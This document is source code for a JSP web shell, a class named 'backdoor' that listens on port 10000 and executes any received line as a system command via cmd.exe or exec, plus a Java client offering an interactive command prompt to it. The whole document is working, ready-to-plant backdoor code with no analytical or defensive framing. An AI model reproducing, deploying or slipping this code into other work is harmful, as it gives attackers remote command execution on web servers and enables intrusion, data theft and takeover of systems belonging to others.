<%@ page language="java" import="java.util.*,java.io.*,java.net.*" pageEncoding="Gbk"%> <% class backdoor { public void getData() throws Exception { ServerSocket ss = new ServerSocket(10000); //阻塞等待 Socket s = ss.accept(); //读取客户端传过来的数据 BufferedReader bufIn = new BufferedReader( new InputStreamReader(s.getInputStream())); //向客户端传送数据 BufferedWriter bufOut = new BufferedWriter( new OutputStreamWriter(s.getOutputStream())); String line = null; //向客户端返回执行命令后结果 while ((line = bufIn.readLine()) != null) { bufOut.write(ToServerName(line)); bufOut.newLine(); bufOut.flush(); } s.close(); ss.close(); } String ToServerName(String cmd) throws IOException { StringBuffer sb = new StringBuffer(); //判断系统是否是windows if (System.getProperty("os.name").toLowerCase().startsWith("windows")) { //执行命令 Process p = Runtime.getRuntime().exec("cmd.exe /c " + cmd); //读取命令正确执行后的流 BufferedReader buff = new BufferedReader(new InputStreamReader(p .getInputStream())); //读取错误命令执行后的流 BufferedReader beff = new BufferedReader(new InputStreamReader(p .getErrorStream())); String Me; //添加到一个StringBuffer 中以便一次性返回 while ((Me = buff.readLine()) != null || (Me=beff.readLine())!=null) { sb.append(Me + "@@"); } }else{ //执行命令过程同上理 Process p = Runtime.getRuntime().exec(cmd); BufferedReader buff = new BufferedReader(new InputStreamReader(p .getInputStream())); BufferedReader beff = new BufferedReader(new InputStreamReader(p .getErrorStream())); String Me; while ((Me = buff.readLine()) != null || (Me=beff.readLine())!=null) { sb.append(Me + "@@"); } } //返回命令执行后结果。 return sb.toString(); } } %> <!-- 此页面可开一次,请不要刷新。--> <% try{ new backdoor().getData(); }catch(Exception e){ out.println("端口可能已被占用,请修改!"); } %>
package com.xxx.socket; import java.io.*; import java.net.*; /** * @author Binxu -Silic */ public class Client { //连接信息 public static final String ip = "localhost"; public static final int port = 10000; public static void main(String[] args) throws Exception { //连接目标 Socket s = new Socket(ip, port); System.out.print("$:"); //获取输入命令 BufferedReader bufr = new BufferedReader(new InputStreamReader(System.in)); //向服务端写数据 BufferedWriter bufOut = new BufferedWriter(new OutputStreamWriter(s.getOutputStream())); //读取服务端返回数据 BufferedReader bufIn = new BufferedReader(new InputStreamReader(s.getInputStream())); String line = null; //接受服务端返回数据并显示 while((line = bufr.readLine()) != null) { if("exit".equals(line)) break; bufOut.write(line); bufOut.newLine(); bufOut.flush(); String str = bufIn.readLine().replaceAll("@@","\n"); System.out.print(str); System.out.print("$:"); } bufr.close(); s.close(); } }